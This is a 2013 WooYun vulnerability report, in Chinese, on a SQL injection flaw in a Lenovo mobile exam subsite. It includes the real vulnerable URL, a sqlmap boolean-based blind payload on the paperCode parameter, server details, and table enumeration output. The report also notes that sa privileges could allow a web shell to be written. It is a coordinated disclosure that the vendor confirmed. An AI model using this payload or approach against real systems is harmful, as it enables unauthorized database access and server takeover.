当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035276

漏洞标题:联想安全问题六某重要分站SQL注射漏洞(sa权限)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-25 21:08

修复时间:2013-10-09 21:09

公开时间:2013-10-09 21:09

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-25: 细节已通知厂商并且等待厂商处理中
2013-08-26: 厂商已经确认,细节仅向厂商公开
2013-09-05: 细节向核心白帽子及相关领域专家公开
2013-09-15: 细节向普通白帽子公开
2013-09-25: 细节向实习白帽子公开
2013-10-09: 细节向公众公开

简要描述:

漏洞好多啊,这个注射权限很高,是sa,理论上说是可以写shell的。
PS:这个服务器居然是vista!!!

详细说明:

注射点:

http://iservice.lenovomobile.com/ETS/Engineer/ExamPapersw.aspx?paperCode=201202164&chutiType=1&examCode=201202165&startTime=00:46:22&endTime=23:46:25&paperTitle=OP%E5%8A%A9%E7%90%86%E8%80%83%E8%AF%95%E8%AF%95%E5%8D%B7&idencode=201202172&eptype=1&cpid=0


第一个参数存在漏洞,后面不知道有没有,没测试。

漏洞证明:

---
Place: GET
Parameter: paperCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: paperCode=201202164' AND 6949=6949 AND 'EDgw'='EDgw&chutiType=1&exa
mCode=201202165&startTime=00:46:22&endTime=23:46:25&paperTitle=OP%E5%8A%A9%E7%90
%86%E8%80%83%E8%AF%95%E8%AF%95%E5%8D%B7&idencode=201202172&eptype=1&cpid=0
---


web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


sa

sql1.jpg


表名

sql2.jpg


45个表

[20:34:12] [INFO] fetching tables for database: SIM_ETS
[20:34:12] [INFO] fetching number of tables for database 'SIM_ETS
[20:34:12] [INFO] resumed: 45


速度很慢,跑了前几个表

[20:34:12] [INFO] fetching tables for database: SIM_ETS
[20:34:12] [INFO] fetching number of tables for database 'SIM_ETS'
[20:34:12] [INFO] resumed: 45
[20:34:12] [INFO] resuming partial value: dbo.Cust_Me
[20:34:12] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[20:34:12] [INFO] retrieved:
[20:34:14] [WARNING] reflective value(s) found and filtering out
nuRule
[20:35:42] [INFO] retrieved: dbo.Cust_MenuRuleLines


跑了一个表,一共有9条(速度太慢了,跑了这个证明可以影响数据)

+----+----------+----------+----------+-----------+-----------+------------+----
--------+------------+
| ID | MenuArch | CallEnum | MenuRule | CreatedOn | CreatedBy | ModifiedOn | Sys
Version | ModifiedBy |
+----+----------+----------+----------+-----------+-----------+------------+----
--------+------------+
+----+----------+----------+----------+-----------+-----------+------------+----
--------+------------+

修复方案:

过滤下吧

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-26 01:25

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无


漏洞评价:

评论